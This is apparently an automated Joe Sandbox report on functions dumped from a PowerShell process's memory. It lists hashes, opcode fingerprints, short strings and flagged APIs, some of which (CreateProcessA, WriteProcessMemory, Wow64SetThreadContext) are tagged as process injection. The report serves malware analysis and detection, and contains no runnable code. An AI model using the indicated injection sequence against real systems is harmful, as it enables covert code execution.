Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 1cd748acb114e80b3099a76392d74dc88184fe4e5328a358f0b843781742b97b
Instruction ID: 39fd08c148e64ebf90ec2fe46d58ced6f2fadd4b95fea0fa127fec5833e2728c
Opcode Fuzzy Hash: 1cd748acb114e80b3099a76392d74dc88184fe4e5328a358f0b843781742b97b
Instruction Fuzzy Hash: 84E1B3B0B10206CFC714DB68C954AAABBF2BF99310F1586AAD4059F355CF31DC45CBA2

Function 072C4D30 Relevance: 5.7, Strings: 4, Instructions: 713COMMON

Download Yara Rule

Strings

4'^q, xrefs: 072C52E7
4'^q, xrefs: 072C5243
4'^q, xrefs: 072C522D
4'^q, xrefs: 072C52D1

Memory Dump Source

Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: e8ea5a5c3f3ffe62b6a9bd96ddaa0073cdc3027a03e28b9bba6d624114926aea
Instruction ID: 32a9ea910bb34436b651bd30f9d7caacc03ff9798535eadc60e43dd2393c558f
Opcode Fuzzy Hash: e8ea5a5c3f3ffe62b6a9bd96ddaa0073cdc3027a03e28b9bba6d624114926aea
Instruction Fuzzy Hash: 265290B4A1021ACFCB14DB58C950B9ABBB2FF95300F14C6A9D409AB355CB71ED85CF92

Function 072C2D55 Relevance: 3.8, Strings: 3, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 072C2E13
$^q, xrefs: 072C2E45
4'^q, xrefs: 072C2E80

Memory Dump Source

Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$$^q$$^q
API String ID: 0-2291298209
Opcode ID: e4cc04e9bbee682a4927f6e666c4987dae768eb141e8d20b615faaf8313ad42e
Instruction ID: 4951d27a9e1b4d150c9ebdd2ec3f4344c49f27165094351df84c25a432e1c2e8
Opcode Fuzzy Hash: e4cc04e9bbee682a4927f6e666c4987dae768eb141e8d20b615faaf8313ad42e
Instruction Fuzzy Hash: 8D31F4B1A24387DFDB25CE25C4006667BF1BF66210F0982BED4059B156DF71E944CB92

Function 0719EB80 Relevance: 3.2, Strings: 2, Instructions: 750COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0719EC94
4'^q, xrefs: 0719ECA0

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 1c5e9d1c24414702beae9c770fe8638fcd6ae8763f821f77a0bb239a60944bc5
Instruction ID: 23a21765a33b68231ea565842a90862d7982d117338879343606982613661c85
Opcode Fuzzy Hash: 1c5e9d1c24414702beae9c770fe8638fcd6ae8763f821f77a0bb239a60944bc5
Instruction Fuzzy Hash: 2F4218B6B002059FCF15DF68C4446AABBE6AF85311F18C4BAD405CF291DB31D94BCBA2

Function 06BD58DB Relevance: 3.1, Strings: 2, Instructions: 558
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06BD5C63
$^q, xrefs: 06BD5C53

Memory Dump Source

Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: edd72e1aecd9cbe9f62de32a8c2f77665729e0c31b3b40915074bbd95d80535a
Instruction ID: e3e9b7136ab7aa4baa8a8fe39d6f47a3accf1e4234a10fe8356dd84397d000e6
Opcode Fuzzy Hash: edd72e1aecd9cbe9f62de32a8c2f77665729e0c31b3b40915074bbd95d80535a
Instruction Fuzzy Hash: 8A326C71E102598FDB65DFA4D854ABDBBB2FF48300F148095E811AF3A4EB389E45CB60

Function 06BD2534 Relevance: 2.7, Strings: 2, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#k^, xrefs: 06BD277B, 06BD2780
+(, xrefs: 06BD274B, 06BD2750

Memory Dump Source

Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd

Similarity

API ID:
String ID: #k^$+(
API String ID: 0-3802973943
Opcode ID: 1912fa9569dbd6f1532f629338a7f48a23d3c235821ca9d57fc5fd60f5bac088
Instruction ID: ca24cfbd6a0f847a8b43adbbfeaed48d903b43174b0cdd254753df0616bfd177
Opcode Fuzzy Hash: 1912fa9569dbd6f1532f629338a7f48a23d3c235821ca9d57fc5fd60f5bac088
Instruction Fuzzy Hash: F3617D74A01248DFDB45EFB4D954BADBBB2FF88300F2440A9E6119B391EB359E41CB50

Function 06BD4F20 Relevance: 2.7, Strings: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 06BD5026
Hbq, xrefs: 06BD50B5

Memory Dump Source

Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: 9359ce3097a6857e7a0dd5aec2ff0f8d42ee7fb2182c5b4a9f1eed1852fec885
Instruction ID: 4a4d9c3e06ac3af338ac06a37c9425138a361b3a6d9e481f84df489efd42ee1b
Opcode Fuzzy Hash: 9359ce3097a6857e7a0dd5aec2ff0f8d42ee7fb2182c5b4a9f1eed1852fec885
Instruction Fuzzy Hash: D3518A31B002158FD769AF78C854A2E77B6FF85340B2044B9DA068B3A1DE35EC06CB91

Function 0719ECAC Relevance: 2.7, Strings: 2, Instructions: 171
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 0719ECEF
(o^q, xrefs: 0719ECFB

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: (o^q$(o^q
API String ID: 0-1946778100
Opcode ID: 936ab97231fc649153b2e424f0af87da7f0230452e480850f06032f7e96cd9db
Instruction ID: ee7161517cc548f5c7ca39920197b1c69344a5e2e9733df084bb547636e5063b
Opcode Fuzzy Hash: 936ab97231fc649153b2e424f0af87da7f0230452e480850f06032f7e96cd9db
Instruction Fuzzy Hash: 0B51FC72700205CFCF15CF58C544A697BE2AF81304F5980B6E8055F2D1DB31DD4ACB92

Function 0719B286 Relevance: 2.6, Strings: 2, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 0719B48A
tP^q, xrefs: 0719B3D5

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tP^q
API String ID: 0-1785267070
Opcode ID: a3230e5d1d939472fad3b8792e65a70b71db2e90462ae47a27ec6af454fc01a8
Instruction ID: 5b1e273b90a6dd6d85eb73391604d6fe6c2efc5b3ff7eaff90c45909cc6d812b
Opcode Fuzzy Hash: a3230e5d1d939472fad3b8792e65a70b71db2e90462ae47a27ec6af454fc01a8
Instruction Fuzzy Hash: EE41C0F0A08109DBDF398F69E544BA9B7E2AF84710F558475D4069B2E1CB31DD42CB51

Function 0719B290 Relevance: 2.6, Strings: 2, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 0719B48A
tP^q, xrefs: 0719B3D5

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tP^q
API String ID: 0-1785267070
Opcode ID: f360a07e6c1b9524f7504bbbc42f3d44b9513e3b897ec313df511e8b82b68f6b
Instruction ID: f1ce1fc2619b0d3272cd4796d3bd912af36402119632b7bac3f58f6555b6ffbd
Opcode Fuzzy Hash: f360a07e6c1b9524f7504bbbc42f3d44b9513e3b897ec313df511e8b82b68f6b
Instruction Fuzzy Hash: E441BFF0B08209DBDF398F69E544BA9B7E2AF85710F558076D4069B2E1C731DD42CB51

Function 07197740 Relevance: 2.6, Strings: 2, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 07197785
tP^q, xrefs: 071977DB

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tP^q
API String ID: 0-1785267070
Opcode ID: e0bdc0bfcd2877da86d5ccc5aade9d7ea59ba6648073103b6525868b77449661
Instruction ID: 0bccecfda54474d2b785769e0c662cb0e406a4fd843ffdb4621dc0bfc733ef12
Opcode Fuzzy Hash: e0bdc0bfcd2877da86d5ccc5aade9d7ea59ba6648073103b6525868b77449661
Instruction Fuzzy Hash: C011BEB0A10105ABCF188F58C889B6AFBA6EF84720F29C469D404AB2C4C732D843C7A1

Function 07195E5C Relevance: 2.6, Strings: 2, Instructions: 61COMMON

Download Yara Rule

Strings

$^q, xrefs: 07195EAB
$^q, xrefs: 07195E8A

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: bcdaa5866392fbcd6796b6437bd44771f0efc683fd075204a34bce850c05ab59
Instruction ID: 913a2a19e1ba2e34c1e1d000e5053792813be494ad53f14f1fa9216df5772152
Opcode Fuzzy Hash: bcdaa5866392fbcd6796b6437bd44771f0efc683fd075204a34bce850c05ab59
Instruction Fuzzy Hash: 4511B9B55083469FDB178B14CC50E62FBB6AF82224F1980B7E805EB1D2E732D856C761

Function 07195C0B Relevance: 2.5, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tP^q, xrefs: 07195C3E
tP^q, xrefs: 07195C4A

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q
API String ID: 0-309238000
Opcode ID: 54bfa65d7131317d2c9ce3197e818bfb644ea2165fb66a593e8b4256ac851b87
Instruction ID: 9acde6613a77867cb9a7f78479cf9f1cfc1195a1437d0e0c84f01c40d6c57375
Opcode Fuzzy Hash: 54bfa65d7131317d2c9ce3197e818bfb644ea2165fb66a593e8b4256ac851b87
Instruction Fuzzy Hash: 4E0197B1F101259BCE254A98C804B6AF7E6EB88B10F14882AF5047F2C0C7329C5283E0

Function 071988E5 Relevance: 1.7, Strings: 1, Instructions: 475COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0719882A

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 16e377037828b783b193ea5339e19abd05f22a9b9ac447f861cbff7619a4ac70
Instruction ID: 538d5ddde62cd5f22b1068e5786e5a0f4071ad8a80d165f506310b0cee987e9a
Opcode Fuzzy Hash: 16e377037828b783b193ea5339e19abd05f22a9b9ac447f861cbff7619a4ac70
Instruction Fuzzy Hash: 1E125EB4A01205DFDB15CF58C985E69BBB2FF8A704F15C069E8099B395CB32ED42CB91

Function 07198308 Relevance: 1.7, Strings: 1, Instructions: 473COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0719882A

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 0fee2d4d845ba0a1c2c82415a00134704ddaaee5d84892f4d5ff701b6d40b21e
Instruction ID: c6d7f8abdd65a784f51f53e4c482c192ff99d10f9f141d345c3be95bb4adc4ae
Opcode Fuzzy Hash: 0fee2d4d845ba0a1c2c82415a00134704ddaaee5d84892f4d5ff701b6d40b21e
Instruction Fuzzy Hash: 38124EB4A01205DFDB15CF58C984E69FBB2BF8A704F15C169E809AB395C732ED42CB81

Function 06C1DE2F Relevance: 1.7, APIs: 1, Instructions: 202
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06C1E00A

Memory Dump Source

Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8ef47f2682990d075032a017195f98bfa818a8bcc6c37846ae210a6c56530a58
Instruction ID: 2bd15449ffefb76813d086bf22f5abbb6e75433b52751aa1689bea1e12d9ad2b
Opcode Fuzzy Hash: 8ef47f2682990d075032a017195f98bfa818a8bcc6c37846ae210a6c56530a58
Instruction Fuzzy Hash: 7E815571D006599FDB50CFA9C9817EEBBF2BF49310F148129E869EB240DB749A81DF81

Function 06C1DE30 Relevance: 1.7, APIs: 1, Instructions: 201
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06C1E00A

Memory Dump Source

Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c4bbe7af043066c6a4819a6f6f2f9c8a2a5a1b760d16acd70e868ecf9557bb91
Instruction ID: aeed1ded582f92f5af9da2d286f8903ae99f3defec23d52fcf30a3dc57211939
Opcode Fuzzy Hash: c4bbe7af043066c6a4819a6f6f2f9c8a2a5a1b760d16acd70e868ecf9557bb91
Instruction Fuzzy Hash: EA815571D006599FDB50CFA9C9817EEBBF2BF49310F148129E869EB240DB749A81DF81

Function 00AFA18D Relevance: 1.6, Strings: 1, Instructions: 392COMMON

Download Yara Rule

Strings

q, xrefs: 00AFA2A9

Memory Dump Source

Source File: 00000004.00000002.2424167969.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_af0000_powershell.jbxd

Similarity

API ID:
String ID: q
API String ID: 0-4110462503
Opcode ID: d0e122d0f3483b809bf7c7b441eb420b8776b91c012e752ddeba0dee9f594b77
Instruction ID: 190f213bd4bf70ffc6ecf05a64bf3088d610ddaeda3fffdec8cd2c6b4daed882
Opcode Fuzzy Hash: d0e122d0f3483b809bf7c7b441eb420b8776b91c012e752ddeba0dee9f594b77
Instruction Fuzzy Hash: DAD169A694E3E45FCB039B6C98704E67FB09E5722070A41D3E0D4DF1B7D228998CC7A6

Function 06C1EE8F Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06C1EF20

Memory Dump Source

Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8632c46b0a8a95ff4874f01d1e7a43a0200c2b19f836d4d7eaa61da1d8c3abc6
Instruction ID: 3a39d6c2f8c1e597de0829bc8ee15b93765018f131986e3900a5aa10e63b8721
Opcode Fuzzy Hash: 8632c46b0a8a95ff4874f01d1e7a43a0200c2b19f836d4d7eaa61da1d8c3abc6
Instruction Fuzzy Hash: 7D2139B5D003599FCB10CFA9C885BDEBBF5FF48320F108429E958A7250C7789944DBA5

Function 06C1EE90 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06C1EF20

Memory Dump Source

Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c7f5724625a487c788726015950ec9a154ab0a7f3f47e966508ececbe8f63322
Instruction ID: 3c948697e2acde556f716fa43865d53c5b21a890c90deabfbf841cad5e9db1dd
Opcode Fuzzy Hash: c7f5724625a487c788726015950ec9a154ab0a7f3f47e966508ececbe8f63322
Instruction Fuzzy Hash: 432139B5D003599FCB10CFA9C885BDEBBF5FF48320F108429E958A7250C7789944DBA5

Function 06C1E5E9 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C1E66E

Memory Dump Source

Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 96dd489bd8ef5005246c9c4a74d8837258b05b2f5291d08cee691213649eb55f
Instruction ID: 05851bf2866a5400904705d8086e307734b828892272a67c05211bfd142ff9af
Opcode Fuzzy Hash: 96dd489bd8ef5005246c9c4a74d8837258b05b2f5291d08cee691213649eb55f
Instruction Fuzzy Hash: 9F214A719002089FCB50CFAAC4857EEBBF4AF49324F14842DD559A7240CB789585CFA5

Function 06C1E5F0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C1E66E

Memory Dump Source

Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d3831f96a50688b0d465fa000298fdd0dd0b270547318bbc323f1de2bdf16d52
Instruction ID: 5ae57e80f338662464e63e8e5f2885893f5f1c7f76be2d3afffb66508f863429
Opcode Fuzzy Hash: d3831f96a50688b0d465fa000298fdd0dd0b270547318bbc323f1de2bdf16d52
Instruction Fuzzy Hash: 772157B1D002088FCB50CFAAC4847EEBBF4AF49324F148429D559A7240CB789984CFA5

Function 00AFA1CA Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

q, xrefs: 00AFA2A9

Memory Dump Source

Source File: 00000004.00000002.2424167969.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_af0000_powershell.jbxd

Similarity

API ID:
String ID: q
API String ID: 0-4110462503
Opcode ID: 311326cee723011b935b8d8b22eef0a02e05d7285874dd933824675b899b9afc
Instruction ID: 97ef8cc19198ccbf05585cfbda9c3a8ec3c41a9dbf3056b2d0107213e289b063
Opcode Fuzzy Hash: 311326cee723011b935b8d8b22eef0a02e05d7285874dd933824675b899b9afc
Instruction Fuzzy Hash: 80A14BA654E3E45FC703AB6898714E67F709E6322071A01D3E0D4DF1B7D1298E8DC7AA

Function 06BD1D70 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

(bq, xrefs: 06BD1DE4

Memory Dump Source

Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: da83497cde9010045de6b461f4a4d55b09cc3469f70f47eb8884b8fa6097ad0e
Instruction ID: 15cf83ad6cca263d0e1f150cec74660995bbb97739cec299d059aeabba5aecbf
Opcode Fuzzy Hash: da83497cde9010045de6b461f4a4d55b09cc3469f70f47eb8884b8fa6097ad0e
Instruction Fuzzy Hash: 0951F475A105168FCB10CF69D48496AF7B1FF89320F158299E9199B781E730F851CBD0

Function 06BD580F Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

p<^q, xrefs: 06BD585A

Memory Dump Source

Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd

Similarity

API ID:
String ID: p<^q
API String ID: 0-1680888324
Opcode ID: 98dfd96b94400e271c65ad346982c747a2f65501fd99da8f694c489401fb7120
Instruction ID: 4ac282108b0250ae75e621314f84ccd78506e5905d7c3b14baff042ccf4aa91d
Opcode Fuzzy Hash: 98dfd96b94400e271c65ad346982c747a2f65501fd99da8f694c489401fb7120
Instruction Fuzzy Hash: B9218EB2B001549FDB55CF2AC840AAA7BE6EF89300B0540A5FC15CB3B1EA32DC51CB60

Function 06BD5820 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

p<^q, xrefs: 06BD585A

Memory Dump Source

Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd

Similarity

API ID:
String ID: p<^q
API String ID: 0-1680888324
Opcode ID: f48bb1a83c841c512d1a90c29b3a024248584ded8bbba2757ad37fc9dddc38ee
Instruction ID: 88e33fdbb407212f25a2089dcdd631025797ffbede4498f665fe06076eac4e95
Opcode Fuzzy Hash: f48bb1a83c841c512d1a90c29b3a024248584ded8bbba2757ad37fc9dddc38ee
Instruction Fuzzy Hash: 6D215EB17001559FDB55CF2AC840AAA7FEAFF8A200B054095FC54CF3A1EA36DC51CB60

Function 00AFA490 Relevance: .7, Instructions: 717COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2424167969.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_af0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2fe4fb40f7c5c008931dfc157b0aa36691f6e5afc95ffd238cb17dabb8a1750
Instruction ID: 25ee1e6486705e823843ae08127beff4d582f9c7c90e7a01ca7f15aa77cc82ca
Opcode Fuzzy Hash: f2fe4fb40f7c5c008931dfc157b0aa36691f6e5afc95ffd238cb17dabb8a1750
Instruction Fuzzy Hash: 8842E6719053889FCB02DFA8C4909EDBFB1AF59310F198196E448EB366C734DD85CBA1

Function 07199E52 Relevance: .5, Instructions: 518COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e4008a20dd5b669af27f6e78214c4f2933b4316fecc729c8ecddc1539b4d742
Instruction ID: 80c83fdfdcf22eaf81d8244de144cf37d8679220205cd17b049cf36d9e81d1d9
Opcode Fuzzy Hash: 1e4008a20dd5b669af27f6e78214c4f2933b4316fecc729c8ecddc1539b4d742
Instruction Fuzzy Hash: 19326C74B002149FDB54CB58C954B99BBB2AF89304F54C0A9D9099F396CB32ED86CF92

Function 00AF86E3 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2424167969.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_af0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b82f7b9abb3dc5a29e781d1f4446c6be2325a463d31885c92645858c55b7d1b
Instruction ID: f92ccf9a4aae04c2a6a5895f6e2d98eeb81dd1f570d3846983d2295d5b900440
Opcode Fuzzy Hash: 3b82f7b9abb3dc5a29e781d1f4446c6be2325a463d31885c92645858c55b7d1b
Instruction Fuzzy Hash: BEE19C35A00208DFDB14DFA5D984AADBBB2EF84354F14C429E505AB3A5CB39EC46CB81

Function 00AF9098 Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2424167969.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_af0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b64becab2096339eddc51dbf9336591e66cde9ea91fc86e7c86ec7311e207e5d
Instruction ID: e7bfc3aeacf07b4ca878ed70ca1ce51536eaa8fbde5eb084e4abfab636335084
Opcode Fuzzy Hash: b64becab2096339eddc51dbf9336591e66cde9ea91fc86e7c86ec7311e207e5d
Instruction Fuzzy Hash: 16E11974A01219AFCB05CF98D584AEEFBB2FF49310F248159E905AB365C731ED86CB90

Function 00AFAE68 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2424167969.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_af0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3c03dc7e4af531fd7aa3404cd1337c52112bf19414c1ad7da80f0b54a4cd460
Instruction ID: 5c3dbc14c3ac25c1a9db004b33993dee8e1e5615735ec8dbf843943b10ca5615
Opcode Fuzzy Hash: c3c03dc7e4af531fd7aa3404cd1337c52112bf19414c1ad7da80f0b54a4cd460
Instruction Fuzzy Hash: 9AD11874A10219DFCB05CFA8D584AADBBB2FF88310F248559F905AB365CB71ED85CB90

Function 00AF8880 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2424167969.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_af0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1becf9e7d01650416b014d2b4a102e538877afcee357a4ca4353c1fd44f867b
Instruction ID: 79fd06852e45adf37e55208306c7dd184603cf77cacd331b634afe0e7b322dda
Opcode Fuzzy Hash: b1becf9e7d01650416b014d2b4a102e538877afcee357a4ca4353c1fd44f867b
Instruction Fuzzy Hash: CA918C34A00209CFDB14DFA5C984BBDBBB2AF84354F148529E516AB3A5DF79EC46CB40

Function 00AF8888 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2424167969.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_af0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52d89a5de594818fa2fbad662bbd5bb00a76d6b88f445bda7cc1be879ab59109
Instruction ID: 5fd24b0f21a78eba71eb3c2ad93cda70a064ddedc58143fdb40050b22c976190
Opcode Fuzzy Hash: 52d89a5de594818fa2fbad662bbd5bb00a76d6b88f445bda7cc1be879ab59109
Instruction Fuzzy Hash: 70919C34A00209CFDB14DFA5C984BBDBBB2AF84354F148529E516AB3A5DF79EC46CB40

Function 00AF30B0 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2424167969.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

